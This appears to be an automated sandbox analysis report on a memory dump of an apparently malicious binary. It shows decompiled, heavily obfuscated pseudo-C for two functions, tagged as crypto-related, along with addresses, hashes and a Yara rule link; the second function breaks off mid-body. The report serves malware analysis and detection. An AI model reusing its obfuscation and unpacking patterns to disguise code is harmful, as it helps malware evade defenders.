				signed int _t476;
				signed int _t479;
				signed int _t482;
				signed int _t485;
				void* _t489;
				signed int _t491;
				signed int _t494;
				signed int _t497;
				signed int _t499;
				signed int _t502;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				void* _t516;
				signed int _t518;
				signed int _t529;
				signed int _t532;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				signed int _t543;
				signed int _t546;
				signed int _t549;
				signed int _t552;
				void* _t561;
				void* _t565;
				signed int _t566;
				void* _t569;
				signed int _t572;
				signed int _t576;
				signed int* _t577;
				signed int* _t578;
				signed int* _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;

				_t467 = __edx;
				_t422 = __ebx;
				_push(__esi);
				 *_t576 =  *_t576 & 0x00000000;
				 *_t576 =  *_t576 + _t565;
				_t566 = _t576;
				_t577 = _t576 + 0xfffffff0;
				_v20 = 0;
				_push(_v20);
				 *_t577 =  *_t577 + __ebx + 0x41d081;
				_t326 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__esi);
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) & 0x00000000;
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) | __esi -  *_t577 ^ _t326;
				_pop(_t529);
				_push(__ebx);
				 *_t577 =  *_t577 & 0x00000000;
				 *_t577 =  *_t577 + __ebx + 0x41c850;
				_push(_v16);
				 *_t577 = __ebx + 0x41cbc9;
				_t329 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__ebx);
				 *_t577 =  *_t577 - __ebx;
				 *_t577 = _t329;
				_push(__edi);
				 *_t577 =  *_t577 ^ __edi;
				 *_t577 =  *_t577 + __ebx + 0x41cab2;
				_t331 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t15);
				_push(__edi);
				 *_t17 = _t331;
				_v12 = _v12 + (__ecx & 0x00000000 | _v20);
				_push(_v12);
				_pop(_t332);
				_pop(_t497);
				_push( *((intOrPtr*)(__ebx + 0x41ca2b)));
				_pop( *_t22);
				_push(_v16);
				_pop(_t431);
				if(_t431 > _t332) {
					_v20 = 0;
					_push(_v20);
					 *_t577 =  *_t577 + __ebx + 0x41cbc9;
					_push(_v20);
					 *_t577 = __ebx + 0x41cab2;
					_t421 =  *((intOrPtr*)(__ebx + 0x41f064))();
					_v20 = _t431;
					 *(__ebx + 0x41ce2d) = 0 ^ _t421;
					_t431 = _v20;
				}
				_t578 = _t577 - 0xfffffffc;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 |  *_t577;
				_v20 = 0;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c95a;
				_t336 =  *((intOrPtr*)(_t422 + 0x41f060))(_v20, _t566);
				_v20 = _t467;
				 *(_t422 + 0x41cd3d) = 0 ^ _t336;
				_t470 = _v20;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c799;
				 *_t578 =  *_t578 ^ _t431;
				 *_t578 =  *_t578 ^ _t422 + 0x0041d050;
				_t339 =  *((intOrPtr*)(_t422 + 0x41f060))(_t431, _t529);
				_v20 = _t529;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) & 0x00000000;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) ^ _t529 & 0x00000000 ^ _t339;
				_t532 = _v20;
				_t579 =  &(_t578[1]);
				_v20 = 0;
				 *_t579 =  *_t579 + (_t339 & 0x00000000) +  *_t578;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c952;
				_v16 = 0;
				 *_t579 =  *_t579 ^ _t422 + 0x0041cbdd;
				_t344 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v16, _v20);
				_v20 = _t532;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) & 0x00000000;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) | _t532 - _v20 | _t344;
				_t535 = _v20;
				_t345 =  *((intOrPtr*)(_t422 + 0x41f068))();
				 *_t579 = _t345;
				_v12 = _v12 & 0x00000000;
				 *_t579 =  *_t579 ^ _t422 + 0x0041c361;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c569;
				_t348 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12, _v20);
				_v20 = _t470;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) & 0x00000000;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) | _t470 & 0x00000000 ^ _t348;
				_t580 =  &(_t579[1]);
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) & 0x00000000;
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) | _t566 ^  *_t580 |  *_t579;
				_t569 = _t566;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 + _t422 + 0x41c29c;
				_v16 = 0;
				 *_t580 =  *_t580 + _t422 + 0x41c80d;
				_t353 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12);
				_v12 = _v20;
				 *((intOrPtr*)(_t422 + 0x41c28c)) = _t353;
				_t476 = _v12;
				 *_t580 = _t497;
				 *_t580 = _t422 + 0x41ce81;
				 *_t580 = _t422 + 0x41cad0;
				_t356 =  *((intOrPtr*)(_t422 + 0x41f068))(_v20, _v20, _v20);
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) & 0x00000000;
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) | _t476 ^  *_t580 | _t356;
				_t479 = _t476;
				 *_t580 =  *_t580 - _t497;
				 *_t580 = _t422 + 0x41c333;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041c5ab;
				_t359 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12, _t497);
				 *_t580 = _t359;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
				_t361 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12);
				 *_t117 = _t535;
				_t432 = _v16;
				 *_t119 = _t361;
				_v16 = _v16 + _t432;
				_push(_v16);
				_pop(_t362);
				_t499 = _t497;
				_v12 = _t499;
				_t434 = _t432 & 0x00000000 | _t499 ^ _v12 ^  *(_t422 + 0x41ce17);
				_t502 = _v12;
				if(_t434 > _t362) {
					 *_t580 = _t422 + 0x41c5ab;
					_v20 = 0;
					 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
					_t418 =  *((intOrPtr*)(_t422 + 0x41f064))(_v20, _v16);
					_v20 = _t502;
					 *(_t422 + 0x41cc6a) = 0 ^ _t418;
					_t502 = _v20;
				}
				_pop( *_t136);
				 *_t580 = 0 ^ _v16;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 + _t422 + 0x41d2cb;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041d0da;
				_t367 =  *((intOrPtr*)(_t422 + 0x41f068))(_t422, _t535, _v16);
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) & 0x00000000;
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) | _t434 & 0x00000000 | _t367;
				_t437 = _t434;
				_t368 =  *((intOrPtr*)(_t422 + 0x41f060))();
				 *_t580 = _t368;
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t422 + 0x0041d2e3;
				_t370 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16, _v12);
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t370;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 ^ _t422 + 0x0041cf21;
				_t372 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16);
				 *_t156 = _t569;
				_t439 = (_t437 & 0x00000000) + _v20;
				 *_t158 = _t372;
				_v12 = _v12 + _t439;
				_push(_v12);
				_pop(_t373);
				_t424 = _t422;
				_v20 = _t479;
				_t441 = _t439 & 0x00000000 | _t479 & 0x00000000 |  *(_t424 + 0x41d124);
				_t482 = _v20;
				if(_t441 > _t373) {
					_t165 = _t424 + 0x41d2e3; // 0x41d2e3
					 *_t580 =  *_t580 & 0x00000000;
					 *_t580 =  *_t580 | _t165;
					_t166 = _t424 + 0x41cf21; // 0x41cf21
					 *_t580 = _t166;
					_t415 =  *((intOrPtr*)(_t424 + 0x41f064))(_v20, _t482);
					_v12 = _t441;
					 *(_t424 + 0x41c275) = 0 ^ _t415;
					_t441 = _v12;
				}
				_pop( *_t172);
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 ^ _v16;
				_t177 = _t424 + 0x41c5c8; // 0x41c5c8
				_v16 = _v16 & 0x00000000;
				 *_t580 =  *_t580 | _t177;
				_t377 =  *((intOrPtr*)(_t424 + 0x41f060))(_v16, _v12);
				_t581 =  &(_t580[1]);
				 *_t182 = _t377;
				_v20 = _v20 + (_t441 & 0x00000000 ^  *_t580);
				_push(_v20);
				_pop(_t378);
				_t537 = _t535;
				 *_t581 = _t537;
				_t444 = 0 ^  *(_t424 + 0x41c106);
				_t540 = 0;
				if(_t444 > _t378) {
					_t187 = _t424 + 0x41c333; // 0x41c333
					_v12 = 0;
					 *_t581 =  *_t581 | _t187;
					_t190 = _t424 + 0x41c5c8; // 0x41c5c8
					 *_t581 =  *_t581 ^ _t444;
					 *_t581 = _t190;
					_t378 =  *((intOrPtr*)(_t424 + 0x41f064))(_t444, _v12);
				}
				_v16 = _t540;
				 *((intOrPtr*)(_t424 + 0x41c594)) = _t378;
				_t543 = _v16;
				_t446 = _t444 & 0x00000000 ^ (_t424 ^  *_t581 | _a4);
				_t427 = _t424;
				_v12 = 0;
				 *_t581 =  *_t581 + _t446;
				_t198 = _t427 + 0x41ccb8; // 0x41ccb8
				_v12 = 0;
				 *_t581 =  *_t581 | _t198;
				_t380 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _v12);
				_v20 = _t446;
				 *((intOrPtr*)(_t427 + 0x41cb42)) = _t380;
				_pop( *_t205);
				_t504 = _t502 & 0x00000000 | _t482 -  *_t581 | _v16;
				_t485 = _t482;
				_t207 = _t427 + 0x41d2a5; // 0x41d2a5
				 *_t581 =  *_t581 ^ _t504;
				 *_t581 =  *_t581 ^ _t207;
				_t382 =  *((intOrPtr*)(_t427 + 0x41f060))(_t504);
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) & 0x00000000;
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) | _t504 & 0x00000000 ^ _t382;
				_t507 = _t504;
				_t572 = _t569;
				_t213 = _t427 + 0x41c4f4; // 0x41c4f4
				_v16 = _v16 & 0x00000000;
				 *_t581 =  *_t581 | _t213;
				_t217 = _t427 + 0x41c4e9; // 0x41c4e9
				 *_t581 =  *_t581 ^ _t485;
				 *_t581 = _t217;
				_t385 =  *((intOrPtr*)(_t427 + 0x41f068))(_t485, _v16);
				_v12 = _t543;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) & 0x00000000;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) ^ (_t543 ^ _v12 | _t385);
				_t546 = _v12;
				_v16 = _t485;
				_v8 = _t507;
				_t229 = _t427 + 0x41c0f6; // 0x41c0f6
				 *_t581 = _t229;
				_t387 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20);
				 *_t581 = _t387;
				_t233 = _t427 + 0x41c3d8; // 0x41c3d8
				_v20 = _v20 & 0x00000000;
				 *_t581 =  *_t581 ^ _t233;
				_t389 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _v12);
				_t453 =  *_t581;
				_t582 =  &(_t581[1]);
				 *_t582 =  *_t582 + _v16;
				_t489 = _t389;
				_t390 = _t489 + _t453;
				_t491 = 0;
				_t455 = _t453 & 0x00000000 ^ _t507 -  *_t582 ^  *(_t427 + 0x41ce7d);
				_t510 = _t507;
				if(_t455 > _t390) {
					_t239 = _t427 + 0x41c0f6; // 0x41c0f6
					_v12 = 0;
					 *_t582 =  *_t582 ^ _t239;
					_t242 = _t427 + 0x41c3d8; // 0x41c3d8
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t242;
					_t390 =  *((intOrPtr*)(_t427 + 0x41f064))(_t491, _v12);
				}
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) & 0x00000000;
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) | _t546 ^  *_t582 | _t390;
				_t549 = _t546;
				_t248 = _t427 + 0x41c2c4; // 0x41c2c4
				_v12 = 0;
				 *_t582 =  *_t582 | _t248;
				_t392 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, 0);
				_v12 = _t510;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) & 0x00000000;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) | _t510 - _v12 ^ _t392;
				_t513 = _v12;
				 *((intOrPtr*)(_t427 + 0x41f080))();
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 ^ _t455;
				_t260 = _t427 + 0x41d1a0; // 0x41d1a0
				_v12 = _v12 & 0x00000000;
				 *_t582 =  *_t582 ^ _t260;
				_t395 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _t572);
				_v12 = _t491;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) & 0x00000000;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) | _t491 - _v12 | _t395;
				_t494 = _v12;
				_pop( *_t272);
				_t456 = _v20;
				do {
					_v8 = _v8 - 1;
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t456;
					_t276 = _t427 + 0x41ccae; // 0x41ccae
					_v20 = 0;
					 *_t582 =  *_t582 + _t276;
					_t397 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _t572);
					_v16 = _v16 & 0x00000000;
					 *_t582 =  *_t582 + _t397;
					_t283 = _t427 + 0x41c045; // 0x41c045
					 *_t582 = _t283;
					_t399 =  *((intOrPtr*)(_t427 + 0x41f060))(_v16, _v16);
					_pop( *_t286);
					_t457 = _v20;
					_v12 = _t549;
					_push(_t457 + _t399);
					_t552 = _v12;
					_pop(_t400);
					_t572 = _t572;
					if((_t457 & 0x00000000 | _t572 & 0x00000000 ^  *(_t427 + 0x41c40d)) > _t400) {
						_t291 = _t427 + 0x41ccae; // 0x41ccae
						_v12 = _v12 & 0x00000000;
						 *_t582 =  *_t582 | _t291;
						_t295 = _t427 + 0x41c045; // 0x41c045
						_v12 = 0;
						 *_t582 =  *_t582 ^ _t295;
						_t400 =  *((intOrPtr*)(_t427 + 0x41f064))(_v12, _v12);
						_v16 = _t552;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) & 0x00000000;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) | _t552 & 0x00000000 ^ _t400;
						_t552 = _v16;
					}
					_t461 =  *_t582;
					_t583 =  &(_t582[1]);
					_v20 = _t552;
					_v12 = _v20;
					_t516 = _a4 + (_t513 & 0x00000000 ^ (_t552 & 0x00000000 | _t461));
					_v20 = _v20 & 0x00000000;
					_push(_v20);
					 *_t583 =  *_t583 | _t461;
					_v16 = _t400;
					_push(_a8 + _t516 + 1);
					_pop(_t518);
					_push(_v12);
					_pop(_t561);
					 *((intOrPtr*)(_t427 + 0x41f0c0))();
					_t549 =  *_t583;
					 *_t583 = _v8;
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 + (_t518 | _a4) + 1;
					_t513 =  *_t583;
					 *_t583 = _a8;
					E022731B3(_t427, _t494, _t513, _t549, (_t518 | _a4) + 1, _t572, _t561);
					_t456 =  *_t583;
					_t582 = _t583 - 0xfffffffc;
				} while (_v8 != 0);
				_pop( *_t323);
				return 0;
			}

0x02271cd0
0x02271cd0
0x02271cd0
0x02271cd1
0x02271cd5
0x02271cd8
0x02271cda
0x02271ce3
0x02271cea
0x02271ced
0x02271cf0
0x02271cf6
0x02271cfc
0x02271d03
0x02271d09
0x02271d10
0x02271d11
0x02271d15
0x02271d1e
0x02271d21
0x02271d24
0x02271d2a
0x02271d2b
0x02271d2e
0x02271d37
0x02271d38
0x02271d3b
0x02271d3e
0x02271d4a
0x02271d50
0x02271d54
0x02271d57
0x02271d5a
0x02271d5d
0x02271d5e
0x02271d5f
0x02271d65
0x02271d68
0x02271d6b
0x02271d6e
0x02271d76
0x02271d7d
0x02271d80
0x02271d89
0x02271d8c
0x02271d8f
0x02271d95
0x02271d9c
0x02271da2
0x02271da2
0x02271daa
0x02271dae
0x02271db2
0x02271dbb
0x02271dc5
0x02271dc8
0x02271dce
0x02271dd5
0x02271ddb
0x02271de5
0x02271de9
0x02271df3
0x02271df6
0x02271df9
0x02271dff
0x02271e07
0x02271e0e
0x02271e14
0x02271e20
0x02271e23
0x02271e2d
0x02271e36
0x02271e3d
0x02271e46
0x02271e50
0x02271e53
0x02271e59
0x02271e61
0x02271e68
0x02271e6e
0x02271e71
0x02271e7a
0x02271e83
0x02271e8a
0x02271e93
0x02271e9a
0x02271e9d
0x02271ea3
0x02271eab
0x02271eb2
0x02271ec0
0x02271ec9
0x02271ed0
0x02271ed6
0x02271edd
0x02271ee4
0x02271eed
0x02271ef7
0x02271efa
0x02271f00
0x02271f07
0x02271f0d
0x02271f13
0x02271f1f
0x02271f2b
0x02271f2e
0x02271f3a
0x02271f41
0x02271f47
0x02271f4f
0x02271f52
0x02271f5b
0x02271f62
0x02271f65
0x02271f6e
0x02271f78
0x02271f7b
0x02271f7e
0x02271f84
0x02271f87
0x02271f8e
0x02271f91
0x02271f94
0x02271f97
0x02271f98
0x02271f99
0x02271fa8
0x02271faa
0x02271faf
0x02271fba
0x02271fc3
0x02271fcd
0x02271fd0
0x02271fd6
0x02271fdd
0x02271fe3
0x02271fe3
0x02271fe8
0x02271ff1
0x02271ffb
0x02271ffe
0x02272008
0x0227200c
0x0227200f
0x0227201b
0x02272022
0x02272028
0x02272029
0x02272032
0x0227203b
0x02272045
0x02272048
0x0227204e
0x02272058
0x02272062
0x02272066
0x02272069
0x02272075
0x02272078
0x0227207f
0x02272082
0x02272085
0x02272088
0x02272089
0x0227208a
0x02272099
0x0227209b
0x022720a0
0x022720a2
0x022720a9
0x022720ad
0x022720b0
0x022720b9
0x022720bc
0x022720c2
0x022720c9
0x022720cf
0x022720cf
0x022720d4
0x022720da
0x022720e1
0x022720e4
0x022720ea
0x022720f1
0x022720f4
0x02272103
0x0227210a
0x0227210d
0x02272110
0x02272113
0x02272114
0x02272117
0x02272122
0x02272124
0x02272127
0x02272129
0x0227212f
0x02272139
0x0227213c
0x02272143
0x02272146
0x02272149
0x02272149
0x0227214f
0x02272156
0x0227215c
0x02272169
0x0227216b
0x0227216c
0x02272176
0x02272179
0x0227217f
0x02272189
0x0227218c
0x02272192
0x02272199
0x022721a2
0x022721b1
0x022721b3
0x022721b4
0x022721bb
0x022721be
0x022721c1
0x022721cd
0x022721d4
0x022721da
0x022721e2
0x022721e3
0x022721e9
0x022721f0
0x022721f3
0x022721fa
0x022721fd
0x02272200
0x02272206
0x0227220e
0x02272215
0x0227221b
0x0227221e
0x02272225
0x0227222b
0x02272234
0x02272237
0x02272240
0x02272243
0x02272249
0x02272250
0x02272253
0x0227225b
0x0227225e
0x02272263
0x02272267
0x0227226a
0x0227226c
0x0227227a
0x0227227c
0x0227227f
0x02272281
0x02272287
0x02272291
0x02272294
0x0227229b
0x0227229f
0x022722a2
0x022722a2
0x022722ae
0x022722b5
0x022722bb
0x022722be
0x022722c4
0x022722ce
0x022722d1
0x022722d7
0x022722df
0x022722e6
0x022722ec
0x022722ef
0x022722f6
0x022722fa
0x022722fd
0x02272303
0x0227230a
0x0227230d
0x02272313
0x0227231b
0x02272322
0x02272328
0x0227232b
0x0227232e
0x02272331
0x02272331
0x02272335
0x02272339
0x0227233c
0x02272342
0x0227234c
0x0227234f
0x02272355
0x0227235c
0x0227235f
0x02272368
0x0227236b
0x02272371
0x02272374
0x02272377
0x0227237e
0x0227237f
0x02272382
0x02272392
0x02272395
0x02272397
0x0227239d
0x022723a4
0x022723a7
0x022723ad
0x022723b7
0x022723ba
0x022723c0
0x022723c8
0x022723cf
0x022723d5
0x022723d5
0x022723da
0x022723dd
0x022723e0
0x022723f0
0x022723fc
0x022723fe
0x02272402
0x02272405
0x02272408
0x02272410
0x02272414
0x02272415
0x0227241d
0x0227241f
0x02272429
0x02272429
0x0227242d
0x02272431
0x02272438
0x02272438
0x0227243b
0x02272442
0x02272445
0x02272448
0x0227245d
0x02272464

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction ID: a47727dee76b2c53296fcb95a9d9ece4f52a00d7808c16aa6b6edc4d98cce9ff
Opcode Fuzzy Hash: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction Fuzzy Hash: 72421672C44218EFEF049FA0C8897EEBBF5FF48321F0544AAD899AA145D7345264CF69

Uniqueness

Uniqueness Score: -1.00%

Function 022743D8, Relevance: .4, Instructions: 371
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E022743D8(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t202;
				void* _t204;
				signed int _t205;
				signed int _t210;
				void* _t212;
				void* _t213;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t228;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				void _t236;
				signed int _t240;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t261;
				signed int _t264;
				signed int _t266;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				void* _t286;
				signed int _t293;
				signed int _t294;
				signed int _t305;
				signed int _t306;
				signed int _t311;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t330;
				signed int _t334;
				signed int _t337;
				signed int _t340;
				signed int _t343;
				void* _t348;
				signed int _t355;
				signed int _t358;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t369;
				signed int* _t370;
				signed int* _t371;
				signed int* _t372;
				signed int* _t373;
				signed int* _t374;
				signed int* _t375;
				signed int* _t376;
				signed int* _t377;

				_t355 = __esi;
				_t337 = __edi;
				 *_t370 =  *_t370 - _t366;
				 *_t370 = __ebx + 0x41c5e4;
				_t202 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t366 - 0x1c) = 0;
				_push( *(_t366 - 0x1c));
				 *_t370 =  *_t370 + _t202;
				_push(__edi);
				 *_t370 =  *_t370 ^ __edi;
				 *_t370 =  *_t370 | __ebx + 0x0041c129;
				_t204 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t274 = (__ecx & 0x00000000) +  *_t370;
				_t371 = _t370 - 0xfffffffc;
				 *(_t366 - 0x1c) = __ebx;
				_push(_t274 + _t204);
				_t261 =  *(_t366 - 0x1c);
				_pop(_t205);
				_push(__edx);
				_t276 = _t274 & 0x00000000 | __edx ^  *_t371 |  *(_t261 + 0x41c62b);
				_pop(_t305);
				if(_t276 > _t205) {
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t261 + 0x0041c5e4;
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 + _t261 + 0x41c129;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f064))(_t366, __esi);
				}
				 *_t371 = _t355;
				 *(_t261 + 0x41d040) = 0 ^ _t205;
				_t358 = 0;
				if( *((intOrPtr*)(_t366 - 0x10)) == 4) {
					_t15 = _t261 + 0x41d1be; // 0x41d1be
					 *_t371 = _t15;
					_t17 = _t261 + 0x41c0a8; // 0x41c0a8
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t17;
					_push( *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24)));
					_pop( *_t19);
					_push( *(_t366 - 0x20));
					_pop( *_t21);
					 *((intOrPtr*)(_t366 - 8)) = 1;
					_t23 = _t261 + 0x41c6f8; // 0x41c6f8
					 *(_t366 - 0x20) =  *(_t366 - 0x20) & 0x00000000;
					 *_t371 =  *_t371 ^ _t23;
					_t251 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x20));
					 *(_t366 - 0x20) = _t305;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) & 0x00000000;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) | _t305 ^  *(_t366 - 0x20) | _t251;
					_t334 =  *(_t366 - 0x20);
					 *((intOrPtr*)(_t366 - 0xc)) = 0x55;
					_t36 = _t261 + 0x41c356; // 0x41c356
					 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
					 *_t371 =  *_t371 | _t36;
					_t253 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x1c));
					 *(_t366 - 0x24) = _t337;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) & 0x00000000;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) | _t337 & 0x00000000 ^ _t253;
					_t337 =  *(_t366 - 0x24);
					 *((intOrPtr*)(_t366 - 0x18)) = 2;
					_t48 = _t261 + 0x41cc3e; // 0x41cc3e
					 *(_t366 - 0x24) =  *(_t366 - 0x24) & 0x00000000;
					 *_t371 =  *_t371 ^ _t48;
					_t52 = _t261 + 0x41cf5b; // 0x41cf5b
					 *_t371 =  *_t371 ^ _t358;
					 *_t371 = _t52;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24));
					 *(_t366 - 0x20) = _t334;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) & 0x00000000;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) | _t334 & 0x00000000 | _t205;
					_t305 =  *(_t366 - 0x20);
				}
				_t306 = _t305 ^ _t305;
				 *_t371 =  *_t371 - _t337;
				 *_t371 = _t306;
				_t60 = _t261 + 0x41c61d; // 0x41c61d
				 *_t371 =  *_t371 ^ _t358;
				 *_t371 = _t60;
				_t210 =  *((intOrPtr*)(_t261 + 0x41f060))(_t358, _t337, _t205);
				 *_t371 = _t210;
				_t63 = _t261 + 0x41cf67; // 0x41cf67
				 *(_t366 - 0x24) = 0;
				 *_t371 =  *_t371 ^ _t63;
				_t212 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x24),  *(_t366 - 0x1c));
				_pop( *_t67);
				_t278 = _t276 & 0x00000000 ^  *(_t366 - 0x24);
				 *(_t366 - 0x24) = _t337;
				_push(_t278 + _t212);
				_t340 =  *(_t366 - 0x24);
				_pop(_t213);
				_t280 = _t278 & 0x00000000 | _t366 & 0x00000000 ^  *(_t261 + 0x41c5dc);
				_t369 = _t366;
				if(_t280 > _t213) {
					_t72 = _t261 + 0x41c61d; // 0x41c61d
					 *(_t369 - 0x1c) = 0;
					 *_t371 =  *_t371 ^ _t72;
					_t75 = _t261 + 0x41cf67; // 0x41cf67
					 *(_t369 - 0x20) = 0;
					 *_t371 =  *_t371 | _t75;
					_t246 =  *((intOrPtr*)(_t261 + 0x41f064))( *(_t369 - 0x20),  *(_t369 - 0x1c));
					 *(_t369 - 0x1c) = _t280;
					 *((intOrPtr*)(_t261 + 0x41cf4f)) = _t246;
					_t280 =  *(_t369 - 0x1c);
				}
				_t372 =  &(_t371[1]);
				 *_t372 = _t280;
				_t283 = 0;
				 *_t372 = _t306 & 0x00000000 |  *_t371;
				_t84 = _t261 + 0x41cef6; // 0x41cef6
				 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
				 *_t372 =  *_t372 | _t84;
				_t88 = _t261 + 0x41ceb9; // 0x41ceb9
				 *_t372 =  *_t372 ^ _t369;
				 *_t372 =  *_t372 ^ _t88;
				_t217 =  *((intOrPtr*)(_t261 + 0x41f068))(_t369,  *(_t369 - 0x1c),  *(_t369 - 0x24));
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) & 0x00000000;
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) | _t283 ^  *_t372 | _t217;
				_t286 = _t283;
				_t373 = _t372 - 0xfffffffc;
				_t311 = _t217 %  *(_t369 - 0x18);
				 *_t373 =  *_t373 & 0x00000000;
				 *_t373 =  *_t373 | _t311;
				_t100 = _t261 + 0x41c52d; // 0x41c52d
				 *(_t369 - 0x24) = 0;
				 *_t373 =  *_t373 ^ _t100;
				_t220 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24), _t286);
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) & 0x00000000;
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) | _t311 & 0x00000000 | _t220;
				_t314 = _t311;
				_t316 = _t314 & 0x00000000 ^  *_t373;
				_t374 = _t373 - 0xfffffffc;
				 *((intOrPtr*)(_t369 - 4)) =  *((intOrPtr*)(_t369 - 4)) - _t316;
				 *(_t369 - 0x24) = 0;
				 *_t374 =  *_t374 | _t316;
				_t112 = _t261 + 0x41c7ee; // 0x41c7ee
				 *_t374 =  *_t374 ^ _t340;
				 *_t374 =  *_t374 ^ _t112;
				_t113 = _t261 + 0x41c513; // 0x41c513
				 *(_t369 - 0x20) = 0;
				 *_t374 =  *_t374 | _t113;
